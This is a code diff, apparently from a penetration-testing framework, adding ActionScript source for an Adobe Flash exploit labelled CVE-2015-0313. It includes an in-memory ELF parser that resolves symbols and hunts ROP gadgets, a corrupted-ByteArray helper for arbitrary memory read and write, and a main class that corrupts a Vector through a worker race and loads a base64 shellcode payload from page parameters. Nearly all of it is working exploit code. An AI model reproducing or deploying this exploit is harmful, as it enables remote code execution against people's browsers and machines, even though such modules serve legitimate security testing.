sempervictus
diff --git a/‎data/exploits/CVE-2015-0313/msf.swf
2.89 KB b/‎data/exploits/CVE-2015-0313/msf.swf
2.89 KB
diff --git a/‎external/source/exploits/CVE-2015-0313/Elf.as
Lines changed: 235 additions & 0 deletions b/‎external/source/exploits/CVE-2015-0313/Elf.as
Lines changed: 235 additions & 0 deletions
diff --git a/‎external/source/exploits/CVE-2015-0313/Exploit.as
Lines changed: 16 additions & 14 deletions b/‎external/source/exploits/CVE-2015-0313/Exploit.as
Lines changed: 16 additions & 14 deletions
diff --git a/‎external/source/exploits/CVE-2015-0313/ExploitByteArray.as
Lines changed: 85 additions & 0 deletions b/‎external/source/exploits/CVE-2015-0313/ExploitByteArray.as
Lines changed: 85 additions & 0 deletions
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
@@ -21,29 +21,34 @@ import flash.system.ApplicationDomain
 import avm2.intrinsics.memory.casi32
 import mx.utils.Base64Decoder
 
-public class Main extends Sprite
+public class Exploit extends Sprite
 {
     private var ov:Vector.<Object> = new Vector.<Object>(80000)
     private var uv:Vector.<uint>
     private var ba:ByteArray = new ByteArray()
     private var worker:Worker
     private var mc:MessageChannel
     private var b64:Base64Decoder = new Base64Decoder()
-    private var payload:String = ""
+    private var payload:ByteArray
+    private var platform:String
+    private var os:String
+	private var exploiter:Exploiter
 
-    public function Main()
+    public function Exploit()
     {
         if (Worker.current.isPrimordial) mainThread()
         else workerThread()
     }
 
     private function mainThread():void
     {
-      //  var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-    //    var pattern:RegExp = / /g;
-  //      b64_payload = b64_payload.replace(pattern, "+")
-//        b64.decode(b64_payload)
-//        payload = b64.toByteArray().toString()
+        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+        os = LoaderInfo(this.root.loaderInfo).parameters.os
+        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+        var pattern:RegExp = / /g;
+        b64_payload = b64_payload.replace(pattern, "+")
+        b64.decode(b64_payload)
+        payload = b64.toByteArray()
 
         ba.length = 0x1000
         ba.shareable = true
@@ -60,7 +65,6 @@ public class Main extends Sprite
         worker.setSharedProperty("mc", mc)
         worker.setSharedProperty("ba", ba)
         ApplicationDomain.currentDomain.domainMemory = ba
-		Logger.log("starting...")
         worker.start()
     }
 
@@ -84,12 +88,10 @@ public class Main extends Sprite
 
     private function onMessage(e:Event):void
     {
-		Logger.log("[*] onMessage")
         var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
-		Logger.log("[*] onMessage - mod: " + mod.toString())
+		Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
         if (mod == 1022) mc.receive()
         else {
-			Logger.log("[*] onMessage - Searching corrupted vector...")
 	        for (var i:uint = 0; i < ov.length; i++) {
 	            if (ov[i].length == 0xffffffff) {
 					uv = ov[i]
@@ -98,10 +100,10 @@ public class Main extends Sprite
 				}
 	        }
 			if (uv == null) {
-				Logger.log("not found")
+				Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
 				return
 			}
-			Logger.log('whooray: ' + uv.length.toString(16))
+			exploiter = new Exploiter(this, platform, os, payload, uv)
         }
     }
 }
 
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}